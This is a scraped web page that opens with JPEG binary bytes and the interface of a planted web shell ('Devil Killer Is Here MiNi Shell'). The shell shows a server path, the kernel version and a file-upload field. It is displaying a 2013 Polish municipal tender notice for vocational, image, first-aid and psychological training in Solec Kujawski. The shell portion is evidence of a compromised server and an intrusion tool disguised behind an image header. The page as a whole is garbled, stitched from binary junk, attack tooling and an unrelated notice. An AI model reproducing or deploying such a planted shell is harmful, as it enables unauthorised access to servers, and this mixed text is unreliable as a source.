JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130312/99574-N-2013.html

<p class="kh_header"><b>Solec Kujawski: Usługi szkoleniowe polegające na  przeprowadzeniu szkoleń i warsztatów w 
w Miejsko-Gminnym Ośrodku Pomocy Społecznej w Solcu Kujawskim w 2013 r.
ramach projektu systemowego Nasza przyszłość w naszych rękach
realizowanego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013,
Priorytet VII Promocja integracji społecznej,  Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji 
przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 99574 - 2013; data zamieszczenia: 12.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Solec Kujawski , ul. 23 Stycznia 7, 86-050 Solec Kujawski, woj. kujawsko-pomorskie, tel. 52 3871325, faks 52 3871253.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.soleckujawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe polegające na  przeprowadzeniu szkoleń i warsztatów w 
w Miejsko-Gminnym Ośrodku Pomocy Społecznej w Solcu Kujawskim w 2013 r.
ramach projektu systemowego Nasza przyszłość w naszych rękach
realizowanego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013,
Priorytet VII Promocja integracji społecznej,  Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji 
przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są  Usługi szkoleniowe polegające na przeprowadzeniu szkoleń i warsztatów w Miejsko-Gminnym Ośrodku Pomocy Społecznej w Solcu Kujawskim w 2013 r. w ramach projektu systemowego Nasza przyszłość w naszych rękachrealizowanego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
CZĘŚĆ 1 DORADZTWO ZAWODOWE
Szczegółowy opis
Konsultacje indywidualne z doradcą zawodowym - przeprowadzenie konsultacji indywidualnych dla 20 uczestników projektu, po 1 godzinie zegarowej dla każdego uczestnika; celem zajęć jest diagnoza indywidualnych predyspozycji zawodowych, opracowanie indywidualnego planu działania, w tym wyboru szkolenia zawodowego niezbędnego do wykonywania pracy w danym zawodzie, dyżury doradcy zawodowego z zastrzeżeniem zapisu pkt 3 rozdz. 4 SIWZ, winny być zorganizowane w godzinach uzgodnionych z uczestnikami projektu; łączna ilość: 20 godzin zegarowych,
Warsztaty aktywnego poszukiwania pracy - przygotowanie i przeprowadzenie warsztatów dla grupy 20 uczestników projektu; celem warsztatów jest pomoc w odnalezieniu się na rynku pracy, między innymi poprzez poznanie metod poszukiwania pracy, sporządzanie dokumentów aplikacyjnych. Zakres tematyczny zajęć współczesny rynek pracy, autoprezentacja, rozmowa kwalifikacyjna, rodzaje umów o pracę, korzyści wynikające ze stosunku pracy. ilość: 10 godzin zegarowych,
Spotkania z doradcą zawodowym - przygotowanie i przeprowadzenie grupowych spotkań z doradcą zawodowym; zajęcia będą prowadzone w 2 grupach:
dla 4 uczestników projektu opiekunowie dzieci niepełnosprawnych, ilość: 3 godziny zegarowe, dla 4 uczestników projektu-(osoby z ustalonym stopniem niepełnosprawności celem zajęć jest diagnoza indywidualnych predyspozycji zawodowych i zwiększenie poczucia bezpieczeństwa w poruszaniu się na rynku pracy, opracowanie indywidualnego planu działania. Zakres tematyczny zajęć współczesny rynek pracy, omówienie dokumentów aplikacyjnych, oraz ulg i przywilejów przysługującym osobom niepełnosprawnym w stosunku pracy, plan działania w zakresie poszukiwania pracy. Ilość 3 godziny zegarowe,
Zamawiający zastrzega sobie możliwość zmiany ilości uczestników ww zajęć w przypadku przerwania lub zakończenia udziału w projekcie, rekrutacji nowego uczestnika i związaną z tym zmianę ilości godzin.
CZĘŚĆ 2 WIZAŻ- KREOWANIE WIZERUNKU
Szczegółowy opis: 
Spotkania grupowe z wizażystką - przygotowanie i przeprowadzenie warsztatów z zakresu doskonalenia umiejętności komunikowania się. Omówienie roli, istoty wizerunku, wyglądu zewnętrznego w trakcie poszukiwania pracy, omówienie typu sylwetki, kształtów twarzy i propozycji fryzur, makijaż, dobór odpowiedniego makijażu do typu urody, do okazji. Przekazanie uczestnikom  materiałów szkoleniowych oraz kosmetyków w trakcie spotkania celem samodzielnego wykonania działań zmierzających  do poprawy własnego wizerunku. Udokumentowanie obecności uczestników na spotkaniu., przekazanie Zamawiającemu karty pracy z odbytego spotkania. Zajęcia prowadzone będą w 2 grupach, dla 17 uczestników projektu; ilość: 4 godziny zegarowe, dla 4 uczestników projektu -opiekunowie dzieci niepełnosprawnych, ilość 4 godziny zegarowe,
Zamawiający zastrzega sobie możliwość zmiany ilości uczestników ww zajęć w przypadku przerwania lub zakończenia udziału w projekcie, rekrutacji nowego uczestnika i związaną z tym zmianę ilości godzin.
CZĘŚĆ 3 KURS PIERWSZEJ POMOCY
Szczegółowy opis: 
Kurs pierwszej pomocy - przygotowanie i przeprowadzenie kursu z zakresu udzielania przedmedycznej pierwszej pomocy, w trakcie których należy przekazać wiedzę teoretyczną  i  praktyczną z zakresu postępowania w miejscu udzielania pomocy w następstwie zatrzymania oddechu i krążenia- resuscytacja krążeniowo-oddechowa, zakrztuszeń, ran i ich zabezpieczeń, porażenia słonecznego, złamań, wstrząsu, porażenia prądem. Wykonawca zobowiązany będzie do udokumentowania obecności uczestników , przekazania Zamawiającemu karty pracy z odbytego kursu.
Kurs prowadzony będzie w 2 grupach, dla 17 uczestników projektu; ilość: 4 godziny zegarowe,  dla 4 uczestników projektu opiekunowie dzieci niepełnosprawnych,
 ilość 4 godziny zegarowe,
Zamawiający zastrzega sobie możliwość zmiany ilości uczestników ww zajęć w przypadku przerwania lub zakończenia udziału w projekcie, rekrutacji nowego uczestnika i związaną z tym zmianę ilości godzin.
CZĘŚĆ 4 PORADNICTWO PSYCHOLOGICZNE
Szczegółowy opis: 
Konsultacje indywidualne z psychologiem - przeprowadzenie konsultacji indywidualnych dla 15 uczestników projektu, po 2 godziny zegarowe dla każdego uczestnika; w ramach indywidualnych konsultacji psycholog winien udzielić uczestnikom wsparcia psychologicznego w formie terapii indywidualnej, w rozwiązywaniu problemów psychologicznych dotyczących przede wszystkim aktywności zawodowej uczestników projektu, w pokonywaniu stresu, przygotować indywidualny plan działania; dyżury psychologa z zastrzeżeniem zapisu pkt. 3 rozdz. 4 SIWZ, winny być zorganizowane w godzinach uzgodnionych z uczestnikami projektu łączna ilość 30 godzin zegarowych,
Warsztaty umiejętności wychowawczych - przygotowanie i przeprowadzenie warsztatów dla grupy 17 uczestników projektu; ilość 10 godzin zegarowych,
Warsztaty umiejętności psychospołecznych - przygotowanie i przeprowadzenie warsztatów, których celem jest między innymi wzmacnianie pozytywnych postaw życiowych i radzenie sobie z sytuacjami kryzysowymi; zajęcia prowadzone będą w 3 grupach- dla 20 uczestników projektu; ilość10 godzin zegarowych dla 4 uczestników projektu opiekunowie dzieci niepełnosprawnych, ilość: 6 godzin zegarowych,
dla 4 uczestników projektu osoby z stopniem niepełnosprawności, ilość 6 godzin zegarowych.
Zamawiający zastrzega sobie możliwość zmiany ilości uczestników ww zajęć w przypadku przerwania lub zakończenia udziału w projekcie, rekrutacji nowego uczestnika i związaną z tym zmianę ilości godzin.
W stosunku do wszystkich części, Wykonawcy zobowiązani są do przekazania w terminie 5 dni kalendarzowych przed rozpoczęciem zajęć szczegółowego programu
 i harmonogramu zajęć, prowadzenia dziennika zajęć, udokumentowanie obecności uczestników projektu na zajęciach, przekazania zamawiającemu kart pracy.
Osoby prowadzące szkolenia powinny mieć odpowiednie uprawnienia do przeprowadzania szkoleń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.56.20.00-1, 80.57.00.00-0, 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać Wykonawcy, którzy spełniają warunki zawarte w art. 22 ust.1 pkt. 1-4 ustawy Pzp,  dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności.
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Pzp - wzór oświadczenia zawarty jest w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia,
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Pzp - wzór oświadczenia zawarty jest w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Pzp - wzór oświadczenia zawarty jest w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli wykaże, że dysponuje:
 dla części 1 zamówienia DORADZTWO ZAWODOWE
co najmniej 1 osobą posiadającą wykształcenie wyższe w zakresie o specjalności doradca zawodowy bądź wykształcenie wyższe lub studia podyplomowe w zakresie doradztwa zawodowego  licencję doradcy zawodowego w rozumieniu przepisów ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy tekst jedn. Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm. oraz przygotowanie pedagogiczne lub trenerskie, doświadczenie w prowadzeniu kursów warsztatów szkoleń o takiej samej lub  podobnej tematyce.  Ocena spełniania warunku będzie dokonana na podstawie wykazu osób uczestniczących w wykonywaniu zamówienia; na zasadzie spełnia/nie spełnia. Przez  kursy warsztaty szkolenia o takiej samej lub  podobnej tematyce rozumie się takie, których zakres obejmuje indywidualne doradztwo zawodowe, jak i spotkania grupowe z zakresu aktywnego poszukiwania pracy. dla części 2 zamówienia WIZAŻ - KREOWANIE WIZERUNKU co najmniej 
1 osoba posiadająca wykształcenie minimum średnie, posiadająca kwalifikacje  zawodowe uprawniające do przeprowadzenia zajęć objętych przedmiotem      
 i  doświadczenie w prowadzeniu kursów/warsztatów/szkoleń o takiej samej lub podobnej  tematyce. Ocena spełniania warunku będzie dokonana na podstawie wykazu osób uczestniczących w wykonywaniu zamówienia; na zasadzie spełnia nie spełnia. Przez  kursy warsztaty szkolenia o takiej samej lub  podobnej tematyce rozumie się takie, których zakres obejmuje tematykę komunikowania się i kreowania wizerunku.  dla części 3  zamówienia KURS PIERWSZEJ POMOCY co najmniej 1 osobą posiadającą wykształcenie minimum średnie oraz stosowne uprawnienia do przeprowadzania szkoleń z zakresu udzielania pierwszej pomocy przedmedycznej ,doświadczenie w prowadzeniu kursów/warsztatów/szkoleń o takiej samej tematyce. Ocena spełniania warunku będzie dokonana na podstawie wykazu osób uczestniczących w wykonywaniu zamówienia; na zasadzie spełnianie  spełnia. Przez  kursy warsztaty szkolenia o takiej samej lub  podobnej tematyce rozumie się takie, których zakres obejmuje udzielanie pierwszej pomocy przedmedycznej.
dla części 4 zamówienia PORADNICTWO  PSYCHOLOGICZNE
co najmniej 1 osoba posiada wykształcenie wyższe  -  dyplom magistra psychologii polskiej uczelni lub wykształcenie uzyskane za granicą uznane za równorzędne w RP oraz przygotowanie pedagogiczne lub trenerskie,  doświadczenie w prowadzeniu kursów warsztatów szkoleń o takiej samej lub  podobnej tematyce.  Ocena spełniania warunku będzie dokonana na podstawie wykazu osób uczestniczących w wykonywaniu zamówienia; na zasadzie spełnia/nie spełnia. Przez  kursy warsztaty szkolenia o takiej samej lub  podobnej tematyce rozumie się takie, których zakres obejmuje indywidualne i grupowe konsultacje psychologiczne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy Pzp - wzór oświadczenia zawarty jest w załączniku nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowania robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a tak że zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami, aktualny odpis z właściwego rejestru  lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji  w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,  wypełniony formularz ofertowy zał. nr 1 do SIWZ opis programów oferowanych szkoleń z uwzględnieniem zakresu przedmiotu zamówienia i  wymagań Zamawiającego zał. nr 6 do SIWZ,
pisemne zobowiązanie innych podmiotów do udostępnienia Wykonawcy niezbędnych zasobów do korzystania z nich przy wykonywaniu zamówienia godnie z art. 26 ust. 2b ustawy Pzp - w przypadku, gdy Wykonawca polega na: wiedzy i doświadczenia, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowych innych podmiotów (zał. nr 7 do SIWZ);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach- zmiany- zwiększenia lub zmniejszenia ilości uczestników projektu biorących udział w zajęciach szkoleniach, warsztatach, indywidualnych konsultacjach, w przypadku przerwania lub zakończenia przez uczestnika udziału w projekcie, rekrutacji nowego uczestnika i związane z tym zmniejszenie lub zwiększenie ilości godzin. W takim przypadku pomniejsza się cenę za zakładaną szacunkową ilość uczestników projektu o koszty za osoby, które przerwały lub zakończyły udział w projekcie. Zamawiający zapłaci za osoby, które ukończyły szkolenie, zmiany terminów realizacji poszczególnych części zamówienia, z przyczyn nieleżących po stronie Wykonawcy, zmiany harmonogramów, zmiany osób biorących udział w wykonaniu zamówienia, tj. przeprowadzających szkolenia, z tym, że inne osoby nie mogą posiadać niższych kwalifikacji od postawionych przez Zamawiającego w SIWZ,
Warunkiem wprowadzenia ww. zmian będzie ich pisemne uzasadnienie. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron w formie pisemnej zastrzeżonej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.soleckujawwski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy
ul. 23 Stycznia 7
86-050 Solec Kujawski
pokój nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2013 godzina 10:00, miejsce: Miejsko Gminny
Ośrodek Pomocy Społecznej
ul. 29 Listopada 12
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane w ramach projektu systemowego Nasza przyszłość w naszych rękach realizowanego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konsultacje indywidualne z doradcą zawodowym - przeprowadzenie konsultacji indywidualnych dla 20 uczestników projektu, po 1 godzinie zegarowej dla każdego uczestnika; celem zajęć jest diagnoza indywidualnych predyspozycji zawodowych, opracowanie indywidualnego planu działania, w tym wyboru szkolenia zawodowego niezbędnego do wykonywania pracy w danym zawodzie, dyżury doradcy zawodowego z zastrzeżeniem zapisu pkt 3 rozdz. 4 SIWZ, winny być zorganizowane w godzinach uzgodnionych z uczestnikami projektu; łączna ilość: 20 godzin zegarowych; termin realizacji: kwiecień 2013 r.
Warsztaty aktywnego poszukiwania pracy - przygotowanie i przeprowadzenie warsztatów dla grupy 20 uczestników projektu; celem warsztatów jest pomoc w odnalezieniu się na rynku pracy, między innymi poprzez poznanie metod poszukiwania pracy, sporządzanie dokumentów aplikacyjnych. Zakres tematyczny zajęć: współczesny rynek pracy, autoprezentacja, rozmowa kwalifikacyjna, rodzaje umów o pracę, korzyści wynikające ze stosunku pracy. ilość: 10 godzin zegarowych; termin realizacji: od maja 2013  do czerwca 2013r.;
Spotkania z doradcą zawodowym - przygotowanie i przeprowadzenie grupowych spotkań z doradcą zawodowym; zajęcia będą prowadzone w 2 grupach:
- dla 4 uczestników projektu opiekunowie dzieci niepełnosprawnych ilość: 3 godziny zegarowe; termin realizacji: wrzesień 2013 r.;
